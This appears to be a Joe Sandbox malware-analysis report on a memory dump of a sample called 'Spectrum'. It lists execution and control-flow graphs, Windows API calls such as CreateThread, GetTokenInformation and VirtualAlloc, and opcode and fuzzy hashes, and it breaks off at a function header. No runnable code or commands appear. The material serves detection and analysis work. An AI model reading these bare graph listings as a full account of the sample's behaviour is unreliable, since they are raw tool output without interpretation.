                                                                                                                                                                                Total number of Nodes:53
                                                                                                                                                                                Total number of Limit Nodes:4
                                                                                                                                                                                execution_graph 3866 7b5b8f 3879 7c53f0 3866->3879 3868 7b5baf 3884 7b81c0 3868->3884 3870 7b5c2c 3871 7b5c85 3890 7b5990 3871->3890 3873 7b5dcd 3873->3873 3874 7b5c20 3874->3870 3874->3871 3878 7b5bbc 3874->3878 3875 7b5cd4 CreateThread CloseHandle 3875->3878 3876 7b5d50 CreateThread 3876->3878 3877 7b5d56 CreateThread 3877->3878 3878->3870 3878->3875 3878->3876 3878->3877 3881 7c53f4 3879->3881 3880 7c53f6 3880->3868 3881->3880 3882 7c545e VirtualAlloc 3881->3882 3883 7c5460 3882->3883 3883->3881 3888 7b81e5 3884->3888 3885 7b8357 GetTokenInformation 3885->3888 3886 7b830b CloseHandle 3886->3888 3887 7b8212 GetTokenInformation 3887->3888 3888->3874 3888->3885 3888->3886 3888->3887 3889 7b81f7 3888->3889 3889->3874 3891 7b5994 wcscpy 3890->3891 3892 7b5a23 3891->3892 3893 7b5a8d VirtualAlloc 3891->3893 3892->3873 3893->3891 3947 7b58de 3948 7c53f0 VirtualAlloc 3947->3948 3949 7b58f9 3948->3949 3950 7b81c0 3 API calls 3949->3950 3951 7b5907 3950->3951 3941 7b81e3 3945 7b81e5 3941->3945 3942 7b8357 GetTokenInformation 3942->3945 3943 7b830b CloseHandle 3943->3945 3944 7b8212 GetTokenInformation 3944->3945 3945->3942 3945->3943 3945->3944 3946 7b81f7 3945->3946 3917 7b5d22 3918 7b5cd4 CreateThread CloseHandle 3917->3918 3919 7b5bbc 3917->3919 3918->3919 3919->3918 3920 7b5c2c 3919->3920 3921 7b5d56 CreateThread 3919->3921 3922 7b5d50 CreateThread 3919->3922 3921->3919 3922->3919 3894 7b5d50 CreateThread 3898 7b5bbc 3894->3898 3895 7b5cd4 CreateThread CloseHandle 3895->3898 3896 7b5c2c 3897 7b5d56 CreateThread 3897->3898 3898->3894 3898->3895 3898->3896 3898->3897 3899 7b83e7 3901 7b81e5 3899->3901 3900 7b830b CloseHandle 3900->3901 3901->3900 3902 7b8212 GetTokenInformation 3901->3902 3903 7b8357 GetTokenInformation 3901->3903 3904 7b81f7 3901->3904 3902->3901 3903->3901

                                                                                                                                                                                Executed Functions

                                                                                                                                                                                Function 007B81C0 Relevance: 4.9, APIs: 3, Instructions: 375COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 0 7b81c0-7b81d8 1 7b83bf-7b83ca 0->1 2 7b81e5 0->2 10 7b83d0 1->10 11 7b8277-7b827a 1->11 3 7b81eb 2->3 4 7b82a3-7b82a5 2->4 8 7b82b2-7b82bc 3->8 9 7b81f1 3->9 6 7b82ab 4->6 7 7b83f9 4->7 6->7 12 7b82b1 6->12 15 7b83ff 7->15 16 7b82d2-7b82d7 7->16 13 7b8357-7b836f GetTokenInformation 8->13 14 7b82c5-7b82c8 8->14 9->8 17 7b81f7-7b828e 9->17 10->11 20 7b83d6 10->20 18 7b827c 11->18 19 7b8241 11->19 12->8 28 7b8376-7b837b 13->28 14->7 21 7b82ce 14->21 23 7bf524-7bf52e 15->23 22 7b8306-7b8309 16->22 18->19 25 7b827e 18->25 19->28 33 7b8251-7b8256 call 7e72f4 19->33 26 7b83d7-7b83dd 20->26 29 7b828f-7b8303 call 7e72ec 21->29 30 7b82d0 21->30 31 7b830b-7b8311 CloseHandle 22->31 32 7b832e-7b8330 22->32 27 7bf807 23->27 25->31 35 7b8284 25->35 26->7 41 7bf8df-7bf8e0 27->41 42 7bf80d 27->42 39 7b8381 28->39 40 7b82f0-7b831c 28->40 29->22 59 7b834f-7b8355 29->59 30->16 30->29 31->32 36 7b82dd-7b82e3 32->36 37 7b8332 32->37 48 7b825b-7b8260 33->48 35->32 45 7b82e9 36->45 46 7b83a3-7b83a4 36->46 37->36 44 7b8334 37->44 39->40 49 7b8387 39->49 40->2 63 7b8322 40->63 55 7c15a5-7c15aa 41->55 42->41 51 7bf813 42->51 44->23 45->46 53 7b82ef 45->53 46->23 54 7b8390-7b8393 48->54 49->11 49->54 57 7bf81b 51->57 58 7bf78f 51->58 53->40 54->25 60 7b8399 54->60 61 7c15ae-7c15af 55->61 57->41 58->57 65 7bf795 58->65 69 7b8212-7b821a GetTokenInformation 59->69 70 7b8341 59->70 60->25 66 7b839f-7b83a1 60->66 67 7c15b2-7c15b7 61->67 63->2 71 7b8328-7b832c 63->71 65->27 66->46 68 7c15ba-7c15c1 67->68 72 7c15c7-7c15d2 68->72 73 7c1750-7c17a2 call 7e72f4 68->73 75 7b83af 69->75 76 7b8220-7b8234 69->76 70->69 74 7b8347 70->74 71->14 71->32 78 7c15d4-7c15d6 72->78 79 7c1620-7c1623 72->79 80 7c1638-7c1640 74->80 81 7b834d 74->81 75->33 83 7b83b5 75->83 76->26 104 7b823a 76->104 86 7c15dc-7c15df 78->86 87 7c1670-7c1684 78->87 88 7c1625-7c1628 79->88 89 7c16a0-7c16b4 79->89 90 7c170e-7c1727 80->90 91 7c1646-7c165f 80->91 81->59 83->33 84 7b83bb-7b83bd 83->84 84->1 86->68 94 7c15e1-7c15f6 86->94 87->55 99 7c168a-7c168d 87->99 88->68 96 7c162a-7c1636 88->96 92 7c16f4-7c16f5 89->92 93 7c16b6-7c16b9 89->93 90->72 97 7c172d 90->97 91->72 98 7c1665 91->98 109 7c16fe-7c170c 92->109 100 7c173a-7c173b 93->100 101 7c16bb 93->101 102 7c15fc-7c1600 94->102 103 7c16d2-7c16d7 94->103 96->80 105 7c16dc-7c16ec 96->105 97->73 98->73 106 7c172f-7c1738 99->106 107 7c1693-7c1697 99->107 113 7c173f-7c1740 100->113 108 7c16bf-7c16cd 101->108 102->109 110 7c1606-7c1618 102->110 103->61 104->26 112 7b8240 104->112 105->72 111 7c16f2 105->111 106->113 107->108 115 7c1744-7c1748 109->115 110->67 111->73 114 7cb32e-7cb330 112->114 113->115 116 7cb300 114->116 117 7cb332-7cb337 call 7e72f4 114->117 121 7cb2fd 116->121 122 7cb302 116->122 117->116 123 7cb339 117->123 124 7cb2ff 121->124 125 7cb305 121->125 123->116 126 7cb33b-7cb33f 123->126 127 7cb308-7cb315 124->127 125->127 128 7cb322-7cb32d 125->128 126->127 127->125 130 7cb317 127->130 128->114 130->121
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000013.00000002.3359629392.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_19_2_7b0000_Spectrum.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 870371e8cd21e9591fa1d6ee57900f9ae47cd9ad1600244e50f9be7de23be927
                                                                                                                                                                                • Instruction ID: 1937ac1ed82d819c1b8447e31d658a1b0cc811e47d49cd8d285749c2ed6e955b
                                                                                                                                                                                • Opcode Fuzzy Hash: 870371e8cd21e9591fa1d6ee57900f9ae47cd9ad1600244e50f9be7de23be927
                                                                                                                                                                                • Instruction Fuzzy Hash: 80B1F73050DA458BCB69CB1D88817F9B7A9FF96314F68826DD89787166DE2CDC02C353
                                                                                                                                                                                Function 007B5B8F Relevance: 4.7, APIs: 3, Instructions: 161threadCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 131 7b5b8f-7b5c20 call 7c53f0 call 7e8358 call 7d0320 call 7b81c0 141 7b5c26 131->141 142 7b5cf4-7b5d08 call 7e72ec 131->142 141->142 144 7b5c2c-7b5c2f 141->144 146 7b5d0e 142->146 147 7b5c87-7b5dc8 call 7b5e60 call 7b5990 142->147 146->147 148 7b5d14-7b5d18 146->148 162 7b5dcd 147->162 152 7b5daf-7b5db6 call 7b52d0 148->152 153 7b5c65 148->153 165 7b5dbc 152->165 166 7b5c30-7b5c39 152->166 155 7b5ca3 call 7b5df0 153->155 156 7b5c67 153->156 173 7b5c45-7b5d6d call 7d1520 155->173 156->155 159 7b5c69-7b5c72 156->159 163 7b5c78 159->163 164 7b5c97-7b5c9d 159->164 162->162 168 7b5d1f-7b5d45 163->168 169 7b5c7e 163->169 183 7b5c9f 164->183 184 7b5c85 164->184 170 7b5dbe 165->170 171 7b5d7d-7b5d89 165->171 180 7b5cb9-7b5cbd 166->180 181 7b5bf7 166->181 190 7b5d47 168->190 191 7b5cd4-7b5cea CreateThread CloseHandle 168->191 169->168 174 7b5c84-7b5d5b CreateThread 169->174 170->171 188 7b5d9b 170->188 185 7b5d8b-7b5d92 171->185 186 7b5d94 171->186 189 7b5bfd-7b5c06 173->189 201 7b5d73 173->201 174->163 195 7b5cc3 180->195 196 7b5d56-7b5d5b CreateThread 180->196 181->180 181->189 183->184 194 7b5ca1 183->194 184->147 185->186 197 7b5d9c 185->197 186->144 202 7b5cb3 186->202 188->197 206 7b5da5-7b5da8 189->206 190->191 191->185 199 7b5cf0-7b5d4d 191->199 194->155 195->196 203 7b5cc9 195->203 196->163 197->206 199->186 201->189 207 7b5d79-7b5d7b 201->207 202->144 202->180 203->196 206->152 207->171
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000013.00000002.3359629392.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_19_2_7b0000_Spectrum.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                                                                • Opcode ID: e247c548eaeea6e430a8624bf88735aaaf0c0aeaa4e38e5d31d111ebab7650c3
                                                                                                                                                                                • Instruction ID: bf715605762a98c7985128a091aeee08835af525a978de396d1ceebe382b954c
                                                                                                                                                                                • Opcode Fuzzy Hash: e247c548eaeea6e430a8624bf88735aaaf0c0aeaa4e38e5d31d111ebab7650c3
                                                                                                                                                                                • Instruction Fuzzy Hash: C5410920318F4ACFDB69A738949D3F93AD2EB55310F6406AAD007CB1A1DA3D8C058762
                                                                                                                                                                                Function 007B5D22 Relevance: 4.5, APIs: 3, Instructions: 42threadCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 208 7b5d22-7b5d45 209 7b5d47 208->209 210 7b5cd4-7b5cea CreateThread CloseHandle 208->210 209->210 211 7b5d8b-7b5d92 210->211 212 7b5cf0-7b5d4d 210->212 215 7b5d9c 211->215 216 7b5d94 211->216 212->216 218 7b5da5-7b5db6 call 7b52d0 215->218 219 7b5c2c-7b5c2f 216->219 220 7b5cb3 216->220 232 7b5dbc 218->232 233 7b5c30-7b5c39 218->233 220->219 221 7b5cb9-7b5cbd 220->221 223 7b5cc3 221->223 224 7b5d56-7b5d5b CreateThread 221->224 223->224 227 7b5cc9 223->227 226 7b5c78 224->226 228 7b5d1f-7b5d45 226->228 229 7b5c7e 226->229 227->224 228->209 228->210 229->228 231 7b5c84-7b5d5b CreateThread 229->231 231->226 235 7b5dbe 232->235 236 7b5d7d-7b5d89 232->236 233->221 242 7b5bf7 233->242 235->236 243 7b5d9b 235->243 236->211 236->216 242->221 244 7b5bfd-7b5c06 242->244 243->215 244->218
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000013.00000002.3359629392.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_19_2_7b0000_Spectrum.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateThread$CloseHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 738052048-0
                                                                                                                                                                                • Opcode ID: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                                                • Instruction ID: 43a5f20f398351d9635ef2c82f2cf48e6566575dc84b3147e1cea396efb69680
                                                                                                                                                                                • Opcode Fuzzy Hash: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                                                • Instruction Fuzzy Hash: 3AF0242072CF0785DB3C973898D93FA6AC3E79A331F640B1ED017C90E0DA3D89029619
                                                                                                                                                                                Function 007B5D50 Relevance: 1.5, APIs: 1, Instructions: 8threadCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 246 7b5d50-7b5d5b CreateThread 247 7b5c78 246->247 248 7b5d1f-7b5d45 247->248 249 7b5c7e 247->249 252 7b5d47 248->252 253 7b5cd4-7b5cea CreateThread CloseHandle 248->253 249->248 250 7b5c84 249->250 250->246 252->253 254 7b5d8b-7b5d92 253->254 255 7b5cf0-7b5d4d 253->255 258 7b5d9c 254->258 259 7b5d94 254->259 255->259 261 7b5da5-7b5db6 call 7b52d0 258->261 262 7b5c2c-7b5c2f 259->262 263 7b5cb3 259->263 271 7b5dbc 261->271 272 7b5c30-7b5c39 261->272 263->262 264 7b5cb9-7b5cbd 263->264 266 7b5cc3 264->266 267 7b5d56-7b5d5b CreateThread 264->267 266->267 269 7b5cc9 266->269 267->247 269->267 273 7b5dbe 271->273 274 7b5d7d-7b5d89 271->274 272->264 279 7b5bf7 272->279 273->274 280 7b5d9b 273->280 274->254 274->259 279->264 281 7b5bfd-7b5c06 279->281 280->258 281->261
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000013.00000002.3359629392.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_19_2_7b0000_Spectrum.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateThread$CloseHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 738052048-0
                                                                                                                                                                                • Opcode ID: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                                                • Instruction ID: 5c5e8480aa51955ed6346f34c8d84f13a2ffbd45bc013f81e2dd86c16611a691
                                                                                                                                                                                • Opcode Fuzzy Hash: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                                                • Instruction Fuzzy Hash: 41B01200228FC7450026173045883A84AC02E47634DB41F6C9F73068D2D82D0C047734
                                                                                                                                                                                Function 007B5990 Relevance: 1.4, APIs: 1, Instructions: 103COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 283 7b5990-7b599b 285 7b5a33-7b5a61 call 7e9b00 283->285 286 7b59a1 283->286 297 7b5a63 285->297 298 7b5ab4-7b5aba call 7d1080 285->298 286->285 288 7b59a7-7b59ab 286->288 291 7b5a59 288->291 292 7b59b1-7b59f3 call 7e2320 288->292 294 7b5a5b 291->294 295 7b5a25-7b5a2d 291->295 292->291 313 7b59f5-7b59fa 292->313 294->295 305 7b5a23 294->305 302 7b5a2f 295->302 303 7b5a70-7b5a7b 295->303 297->298 300 7b5a65 297->300 316 7b5a83-7b5a88 call 7b5df0 298->316 319 7b5a13 298->319 300->303 302->300 306 7b5a7d 303->306 307 7b5a16-7b5a1e call 7d1470 303->307 311 7b5a24 305->311 306->307 312 7b5a7f-7b5a81 306->312 320 7b5a96-7b5ac2 307->320 312->316 317 7b59fc 313->317 318 7b5a51-7b5a54 call 7e233c 313->318 325 7b5a8d VirtualAlloc 316->325 317->318 322 7b59fe-7b5a02 317->322 318->291 319->316 324 7b5a15 319->324 320->311 327 7b5ac8 320->327 322->318 324->307 325->320 327->311 328 7b5ace 327->328 328->285
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000013.00000002.3359629392.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_19_2_7b0000_Spectrum.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wcscpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1284135714-0
                                                                                                                                                                                • Opcode ID: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                                                • Instruction ID: e1b1a63e853ca873728cbfd544939baa69e96ce13917b88ea1574e80835e1b6f
                                                                                                                                                                                • Opcode Fuzzy Hash: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                                                • Instruction Fuzzy Hash: CB21D82151DE84CFC76AA32854E53FA2EA2F799324F5883DBD086FB182D93D5D059242
                                                                                                                                                                                Function 007B8245 Relevance: 1.3, APIs: 1, Instructions: 44COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 330 7b8245-7b8247 331 7b824d-7b824f 330->331 332 7b82d2-7b82d7 330->332 333 7b8251-7b8260 call 7e72f4 331->333 334 7b8306-7b8309 332->334 344 7b8390-7b8393 333->344 336 7b830b-7b8311 CloseHandle 334->336 337 7b832e-7b8330 334->337 336->337 338 7b82dd-7b82e3 337->338 339 7b8332 337->339 342 7b82e9 338->342 343 7b83a3-7b83a4 338->343 339->338 341 7b8334 339->341 345 7bf524-7bf52e 341->345 342->343 346 7b82ef 342->346 343->345 347 7b8399 344->347 348 7b827e 344->348 350 7bf807 345->350 352 7b82f0-7b831c 346->352 347->348 351 7b839f-7b83a1 347->351 348->336 349 7b8284 348->349 349->337 353 7bf8df-7bf8e0 350->353 354 7bf80d 350->354 351->343 363 7b8322 352->363 364 7b81e5 352->364 357 7c15a5-7c15aa 353->357 354->353 356 7bf813 354->356 359 7bf81b 356->359 360 7bf78f 356->360 361 7c15ae-7c15af 357->361 359->353 360->359 365 7bf795 360->365 366 7c15b2-7c15b7 361->366 363->364 370 7b8328-7b832c 363->370 368 7b81eb 364->368 369 7b82a3-7b82a5 364->369 365->350 367 7c15ba-7c15c1 366->367 371 7c15c7-7c15d2 367->371 372 7c1750-7c17a2 call 7e72f4 367->372 375 7b82b2-7b82bc 368->375 376 7b81f1 368->376 373 7b82ab 369->373 374 7b83f9 369->374 370->337 377 7b82c5-7b82c8 370->377 379 7c15d4-7c15d6 371->379 380 7c1620-7c1623 371->380 373->374 381 7b82b1 373->381 374->332 384 7b83ff 374->384 375->377 382 7b8357-7b836f GetTokenInformation 375->382 376->375 385 7b81f7-7b828e 376->385 377->374 383 7b82ce 377->383 387 7c15dc-7c15df 379->387 388 7c1670-7c1684 379->388 389 7c1625-7c1628 380->389 390 7c16a0-7c16b4 380->390 381->375 398 7b8376-7b837b 382->398 391 7b828f-7b8303 call 7e72ec 383->391 392 7b82d0 383->392 384->345 387->367 397 7c15e1-7c15f6 387->397 388->357 400 7c168a-7c168d 388->400 389->367 399 7c162a-7c1636 389->399 394 7c16f4-7c16f5 390->394 395 7c16b6-7c16b9 390->395 391->334 424 7b834f-7b8355 391->424 392->332 392->391 413 7c16fe-7c170c 394->413 401 7c173a-7c173b 395->401 402 7c16bb 395->402 404 7c15fc-7c1600 397->404 405 7c16d2-7c16d7 397->405 398->352 406 7b8381 398->406 407 7c16dc-7c16ec 399->407 408 7c1638-7c1640 399->408 409 7c172f-7c1738 400->409 410 7c1693-7c1697 400->410 419 7c173f-7c1740 401->419 411 7c16bf-7c16cd 402->411 404->413 414 7c1606-7c1618 404->414 405->361 406->352 416 7b8387 406->416 407->371 415 7c16f2 407->415 417 7c170e-7c1727 408->417 418 7c1646-7c165f 408->418 409->419 410->411 420 7c1744-7c1748 413->420 414->366 415->372 416->344 421 7b8277-7b827a 416->421 417->371 422 7c172d 417->422 418->371 423 7c1665 418->423 419->420 425 7b827c 421->425 426 7b8241 421->426 422->372 423->372 428 7b8212-7b821a GetTokenInformation 424->428 429 7b8341 424->429 425->348 425->426 426->333 426->398 431 7b83af 428->431 432 7b8220-7b8234 428->432 429->428 430 7b8347 429->430 430->408 433 7b834d 430->433 431->333 435 7b83b5 431->435 439 7b823a 432->439 440 7b83d7-7b83dd 432->440 433->424 435->333 436 7b83bb-7b83ca 435->436 436->421 443 7b83d0 436->443 439->440 442 7b8240 439->442 440->374 445 7cb32e-7cb330 442->445 443->421 446 7b83d6 443->446 447 7cb300 445->447 448 7cb332-7cb337 call 7e72f4 445->448 446->440 452 7cb2fd 447->452 453 7cb302 447->453 448->447 454 7cb339 448->454 455 7cb2ff 452->455 456 7cb305 452->456 454->447 457 7cb33b-7cb33f 454->457 458 7cb308-7cb315 455->458 456->458 459 7cb322-7cb32d 456->459 457->458 458->456 461 7cb317 458->461 459->445 461->452
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000013.00000002.3359629392.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_19_2_7b0000_Spectrum.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                • Opcode ID: abeeb7420c1f47a5a155fc40ccd1a1890ae2ccf5a29964df3ea308a91953a94f
                                                                                                                                                                                • Instruction ID: 8ac859f39cc2494e46740a0c768f134e4913802c0f2b8a87c379b53869bb9d0a
                                                                                                                                                                                • Opcode Fuzzy Hash: abeeb7420c1f47a5a155fc40ccd1a1890ae2ccf5a29964df3ea308a91953a94f
                                                                                                                                                                                • Instruction Fuzzy Hash: E7F0A43950DA818FDAAA871898507FA6BE4BF55F10B5900DED446CB122CE1C9C02D753
                                                                                                                                                                                Function 007B8318 Relevance: 1.3, APIs: 1, Instructions: 36COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 462 7b8318-7b831c 463 7b8322 462->463 464 7b81e5 462->464 463->464 467 7b8328-7b832c 463->467 465 7b81eb 464->465 466 7b82a3-7b82a5 464->466 470 7b82b2-7b82bc 465->470 471 7b81f1 465->471 468 7b82ab 466->468 469 7b83f9 466->469 472 7b832e-7b8330 467->472 473 7b82c5-7b82c8 467->473 468->469 476 7b82b1 468->476 479 7b83ff 469->479 480 7b82d2-7b82d7 469->480 470->473 477 7b8357-7b836f GetTokenInformation 470->477 471->470 481 7b81f7-7b828e 471->481 474 7b82dd-7b82e3 472->474 475 7b8332 472->475 473->469 478 7b82ce 473->478 483 7b82e9 474->483 484 7b83a3-7b83a4 474->484 475->474 482 7b8334 475->482 476->470 492 7b8376-7b837b 477->492 485 7b828f-7b8303 call 7e72ec 478->485 486 7b82d0 478->486 488 7bf524-7bf52e 479->488 487 7b8306-7b8309 480->487 482->488 483->484 493 7b82ef 483->493 484->488 485->487 506 7b834f-7b8355 485->506 486->480 486->485 487->472 494 7b830b-7b8311 CloseHandle 487->494 491 7bf807 488->491 498 7bf8df-7bf8e0 491->498 499 7bf80d 491->499 496 7b8381 492->496 497 7b82f0-7b831c 492->497 493->497 494->472 496->497 501 7b8387 496->501 497->463 497->464 507 7c15a5-7c15aa 498->507 499->498 503 7bf813 499->503 504 7b8390-7b8393 501->504 505 7b8277-7b827a 501->505 512 7bf81b 503->512 513 7bf78f 503->513 514 7b8399 504->514 515 7b827e 504->515 509 7b827c 505->509 510 7b8241 505->510 518 7b8212-7b821a GetTokenInformation 506->518 519 7b8341 506->519 516 7c15ae-7c15af 507->516 509->510 509->515 510->492 522 7b8251-7b8260 call 7e72f4 510->522 512->498 513->512 521 7bf795 513->521 514->515 523 7b839f-7b83a1 514->523 515->494 520 7b8284 515->520 524 7c15b2-7c15b7 516->524 528 7b83af 518->528 529 7b8220-7b8234 518->529 519->518 526 7b8347 519->526 520->472 521->491 522->504 523->484 525 7c15ba-7c15c1 524->525 530 7c15c7-7c15d2 525->530 531 7c1750-7c17a2 call 7e72f4 525->531 532 7c1638-7c1640 526->532 533 7b834d 526->533 528->522 536 7b83b5 528->536 555 7b823a 529->555 556 7b83d7-7b83dd 529->556 539 7c15d4-7c15d6 530->539 540 7c1620-7c1623 530->540 541 7c170e-7c1727 532->541 542 7c1646-7c165f 532->542 533->506 536->522 537 7b83bb-7b83ca 536->537 537->505 569 7b83d0 537->569 545 7c15dc-7c15df 539->545 546 7c1670-7c1684 539->546 548 7c1625-7c1628 540->548 549 7c16a0-7c16b4 540->549 541->530 550 7c172d 541->550 542->530 551 7c1665 542->551 545->525 554 7c15e1-7c15f6 545->554 546->507 558 7c168a-7c168d 546->558 548->525 557 7c162a-7c1636 548->557 552 7c16f4-7c16f5 549->552 553 7c16b6-7c16b9 549->553 550->531 551->531 570 7c16fe-7c170c 552->570 559 7c173a-7c173b 553->559 560 7c16bb 553->560 562 7c15fc-7c1600 554->562 563 7c16d2-7c16d7 554->563 555->556 564 7b8240 555->564 556->469 557->532 565 7c16dc-7c16ec 557->565 566 7c172f-7c1738 558->566 567 7c1693-7c1697 558->567 575 7c173f-7c1740 559->575 568 7c16bf-7c16cd 560->568 562->570 571 7c1606-7c1618 562->571 563->516 574 7cb32e-7cb330 564->574 565->530 572 7c16f2 565->572 566->575 567->568 569->505 576 7b83d6 569->576 577 7c1744-7c1748 570->577 571->524 572->531 578 7cb300 574->578 579 7cb332-7cb337 call 7e72f4 574->579 575->577 576->556 583 7cb2fd 578->583 584 7cb302 578->584 579->578 585 7cb339 579->585 586 7cb2ff 583->586 587 7cb305 583->587 585->578 588 7cb33b-7cb33f 585->588 589 7cb308-7cb315 586->589 587->589 590 7cb322-7cb32d 587->590 588->589 589->587 592 7cb317 589->592 590->574 592->583
                                                                                                                                                                                APIs
                                                                                                                                                                                • CloseHandle.KERNELBASE ref: 007B830B
                                                                                                                                                                                • GetTokenInformation.KERNELBASE ref: 007B8369
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000013.00000002.3359629392.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_19_2_7b0000_Spectrum.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseHandleInformationToken
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3954737543-0
                                                                                                                                                                                • Opcode ID: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                                                • Instruction ID: 2eba3a28543f90b14d7c8f56b82c3516e1512b792baac05b568a138bf38ba66a
                                                                                                                                                                                • Opcode Fuzzy Hash: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                                                • Instruction Fuzzy Hash: 1DF0903440DA458B8AB58B18D8407FA67A87F21F50B6C005EC446CB122CE2CDD42EB53
                                                                                                                                                                                Function 007B83E7 Relevance: 1.3, APIs: 1, Instructions: 36COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
